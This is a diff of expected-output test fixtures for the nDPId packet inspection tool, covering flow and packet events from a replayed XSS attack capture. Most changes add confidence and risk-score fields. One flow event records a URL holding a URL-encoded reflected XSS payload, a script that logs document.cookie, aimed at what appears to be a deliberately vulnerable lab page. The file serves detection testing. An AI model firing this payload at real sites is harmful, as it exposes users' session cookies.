-01005{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2733,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347291442,"flow_last_seen":1499347295227,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1499347295227,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55632,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27JUL2D3WXHEGWRAFJE2PI7OS71Z4Z8RFUHXGNFLUFYVP6M3OL55%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
+01111{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2733,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347291442,"flow_last_seen":1499347295227,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1499347295227,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55632,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27JUL2D3WXHEGWRAFJE2PI7OS71Z4Z8RFUHXGNFLUFYVP6M3OL55%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2743,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347296462,"flow_last_seen":1499347296462,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347296462,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55686,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2743,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1499347296462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347296462,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TjBAAD4Gd6CsEAABwKgKMtmGAFCTXWbOAAAAAKACchBgyQAAAgQFtAQCCAoBOij+AAAAAAEDAwc="}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2744,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":2,"flow_last_seen":1499347296462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347296462,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2YaJqN5wk11mz6AScSD7NQAAAgQFtAQCCAoD4\/p1AToo\/gEDAwc="}
@@ -1024,17 +1024,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2782,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1499347301520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347301520,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80Q9AAD4G9MCsEAABwKgKMtm8AFCdpvzgAAAAAKACchC7RgAAAgQFtAQCCAoBOi3vAAAAAAEDAwc="}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2783,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":2,"flow_last_seen":1499347301520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347301520,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2bw9W3Mnnab84aAScSAIWgAAAgQFtAQCCAoD4\/9lATot7wEDAwc="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2784,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":3,"flow_last_seen":1499347301521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347301521,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00RBAAD4G9MesEAABwKgKMtm8AFCdpvzhPVtzKIAQAOWnYQAAAQEICgE6Le8D4\/9l"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347174667,"flow_last_seen":1499347180662,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347303874,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54390,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347174667,"flow_last_seen":1499347180662,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347303874,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54390,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347174667,"flow_last_seen":1499347180662,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347303874,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54390,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347177248,"flow_last_seen":1499347182663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347303874,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54416,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347177248,"flow_last_seen":1499347182663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347303874,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54416,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347177248,"flow_last_seen":1499347182663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347303874,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347178540,"flow_last_seen":1499347183663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347303874,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54430,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347178540,"flow_last_seen":1499347183663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347303874,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54430,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347178540,"flow_last_seen":1499347183663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347303874,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54430,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347181178,"flow_last_seen":1499347186665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347303874,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54456,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347181178,"flow_last_seen":1499347186665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347303874,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54456,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347181178,"flow_last_seen":1499347186665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347303874,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54456,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347182435,"flow_last_seen":1499347187664,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347303874,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54470,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347182435,"flow_last_seen":1499347187664,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347303874,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54470,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347182435,"flow_last_seen":1499347187664,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347303874,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347183714,"flow_last_seen":1499347189665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347303874,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54484,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347183714,"flow_last_seen":1499347189665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347303874,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54484,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347183714,"flow_last_seen":1499347189665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347303874,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347304125,"flow_last_seen":1499347304125,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347304125,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1499347304125,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347304125,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8hKxAAD4GQSSsEAABwKgKMtnWAFBzErTWAAAAAKACchArQAAAAgQFtAQCCAoBOjB6AAAAAAEDAwc="}
@@ -1060,17 +1060,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2875,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1499347313106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347313106,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80LNAAD4G9RysEAABwKgKMto0AFBr7OnzAAAAAKACchD0JAAAAgQFtAQCCAoBOjlAAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":2,"flow_last_seen":1499347313106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347313106,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2jRgNfxEa+zp9KAScSCJ7wAAAgQFtAQCCAoD5Aq2ATo5QAEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2877,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":3,"flow_last_seen":1499347313106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347313106,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00LRAAD4G9SOsEAABwKgKMto0AFBr7On0YDX8RYAQAOUo9wAAAQEICgE6OUAD5Aq2"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347186286,"flow_last_seen":1499347191666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347314123,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54510,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347186286,"flow_last_seen":1499347191666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347314123,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54510,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347186286,"flow_last_seen":1499347191666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347314123,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54510,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347187548,"flow_last_seen":1499347192666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347314123,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54524,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347187548,"flow_last_seen":1499347192666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347314123,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54524,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347187548,"flow_last_seen":1499347192666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347314123,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347188799,"flow_last_seen":1499347194667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347314123,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54538,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347188799,"flow_last_seen":1499347194667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347314123,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54538,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347188799,"flow_last_seen":1499347194667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347314123,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347190051,"flow_last_seen":1499347195667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347314123,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54552,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347190051,"flow_last_seen":1499347195667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347314123,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54552,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347190051,"flow_last_seen":1499347195667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347314123,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54552,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347191299,"flow_last_seen":1499347196667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347314123,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54566,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
